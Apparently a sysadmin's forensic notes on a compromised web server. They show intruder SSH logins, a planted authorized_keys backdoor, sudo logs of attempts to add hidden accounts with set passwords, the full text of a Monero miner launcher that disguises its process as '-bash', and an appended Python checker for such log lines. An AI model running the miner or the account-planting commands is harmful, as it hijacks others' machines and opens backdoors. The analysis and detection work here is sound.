> * create ~www-data/.ssh : ---------- 1 root root 0 Nov 28 08:19 .ssh
Nov 15 06:59:08 mercury sshd[28025]: Accepted password for www-data from 200.187.150.144 port 10248 ssh2
Nov 20 10:53:56 mercury sshd[9291]: Accepted password for www-data from 155.133.82.12 port 51625 ssh2
Nov 20 12:34:46 mercury sshd[12877]: Accepted publickey for www-data from 155.133.82.12 port 57274 ssh2
Nov 20 12:34:46 mercury sshd[12879]: Accepted publickey for www-data from 155.133.82.12 port 57280 ssh2
/var/www had a .ssh/ dated 2017-11-20, and this in authorized_keys:

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDtS6xFlhMDBbJHpbeSKNbs3z3+tv/TEy3dOStR0DxNXNmHG0ub/yJWeV7+1fKW9U4Vmw5xyZAweAm8Firt9174tFViaPmGS/glWfxUcpdCRai7BjIWfxkFyxQVDSndtL3AJBm+0ekTrK+j8QRYzKzyvJUnfL3NSOvsH186ziaB6eTsBhWXUYAiU0y+2z6p/XYfzvs984IWOg/rLbeofRZSdU1Kx2g5Wix7UMS+Oi2UFwTFWvNWstkuNOLPg92DMaMiRgEKycwf1JfUrY8nWI7kwlJz/VO5rE9+J2o7ulI6eDWY5q7+zylKLg4bXnkS7wYYUfEPXobtNLgkZ5SUo6DD root@studiantes

sudo log:

mercury.bonmot.ca : Nov 20 10:54:15 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=command /usr/sbin/useradd -s /bin/false -p "qqq" listd
mercury.bonmot.ca : Nov 20 10:54:15 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=echo "54e172662" | passwd --stdin listd
mercury.bonmot.ca : Nov 20 10:54:16 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=cat /etc/passwd

it's this code: https://forums.gentoo.org/viewtopic-t-1071762.html?sid=dd3123941f591f81c8ab5b8c4769dd1f
/tmp/.s/upd looks like:

#!/bin/bash
#[+] Miner v2.0 - 2017
#[+] Author: PRG @ #old UnderNet
wallet="4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtZ7SRLYc36Q2utLZ8"
proc=`nproc`
ARCH=`uname -m`
HIDE="-bash"
if [ "$ARCH" == "i686" ]; then
./h32 -s $HIDE ./md32 -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u $wallet -p x >>/dev/null &
elif [ "$ARCH" == "x86_64" ]; then
./h64 -s $HIDE ./md -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u $wallet -p x >>/dev/null &
fi
echo $! > bash.pid

Running, the miner shows up in ps output with its process name replaced by the HIDE value, so it looks like a bash shell:

0 S www-data 18219 1 4 80 0 - 28841 futex_ 10:13 ? 00:00:19 -bash -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtZ7SRLYc36Q2utLZ8 -p x
---
mercury.bonmot.ca : Nov 27 23:21:30 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=command /usr/sbin/useradd -s /bin/false -p "qqq" ircd
mercury.bonmot.ca : Nov 27 23:21:46 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=echo "266254e17" | passwd --stdin ircd
mercury.bonmot.ca : Nov 27 23:22:01 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=cat /etc/passwd
mercury.bonmot.ca : Nov 28 02:36:29 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=command /usr/sbin/useradd -s /bin/false -p "qqq" ircd
mercury.bonmot.ca : Nov 28 02:36:43 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=echo "266254e17" | passwd --stdin ircd
mercury.bonmot.ca : Nov 28 02:36:57 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=cat /etc/passwd
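As an added example (not part of the original note), a small Python checker that flags what the sshd and sudo lines above have in common: a web service account logging in over SSH and then trying sudo. The SERVICE_ACCOUNTS list and the "alice" line are constructed assumptions; the other sample lines are copied from this note.

```python
import re
from collections import defaultdict

# Accounts that should never get an interactive SSH login or run sudo.
# Assumption for this example: adjust to the host's own service users.
SERVICE_ACCOUNTS = {"www-data", "nobody", "apache", "nginx"}

SSHD_RE = re.compile(
    r"sshd\[\d+\]: Accepted (?P<method>\w+) for (?P<user>\S+) "
    r"from (?P<ip>\S+) port (?P<port>\d+)"
)
SUDO_RE = re.compile(
    r"(?P<user>\S+) : user NOT in sudoers ;.*?USER=(?P<target>\S+) ; "
    r"COMMAND=(?P<cmd>.*)$"
)

# Constructed sample: two sshd and two sudo lines from the note above,
# plus one ordinary user login that must not be flagged.
SAMPLE_LOG = [
    "Nov 15 06:59:08 mercury sshd[28025]: Accepted password for www-data from 200.187.150.144 port 10248 ssh2",
    "Nov 20 12:34:46 mercury sshd[12877]: Accepted publickey for www-data from 155.133.82.12 port 57274 ssh2",
    "Nov 20 12:35:01 mercury sshd[12900]: Accepted publickey for alice from 10.0.0.5 port 50000 ssh2",
    'mercury.bonmot.ca : Nov 20 10:54:15 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=command /usr/sbin/useradd -s /bin/false -p "qqq" listd',
    "mercury.bonmot.ca : Nov 20 10:54:16 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=cat /etc/passwd",
]

def scan(lines):
    """Return (kind, user, detail, extra) tuples for service-account activity."""
    findings = []
    for line in lines:
        m = SSHD_RE.search(line)
        if m and m["user"] in SERVICE_ACCOUNTS:
            findings.append(("ssh-login", m["user"], m["method"], m["ip"]))
            continue
        m = SUDO_RE.search(line)
        if m and m["user"] in SERVICE_ACCOUNTS:
            findings.append(("sudo-attempt", m["user"], m["target"], m["cmd"]))
    return findings

def summarize(findings):
    """Per account: login count, distinct source IPs, sudo attempt count."""
    out = defaultdict(lambda: {"logins": 0, "sources": set(), "sudo": 0})
    for kind, user, _, extra in findings:
        if kind == "ssh-login":
            out[user]["logins"] += 1
            out[user]["sources"].add(extra)
        else:
            out[user]["sudo"] += 1
    return dict(out)

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```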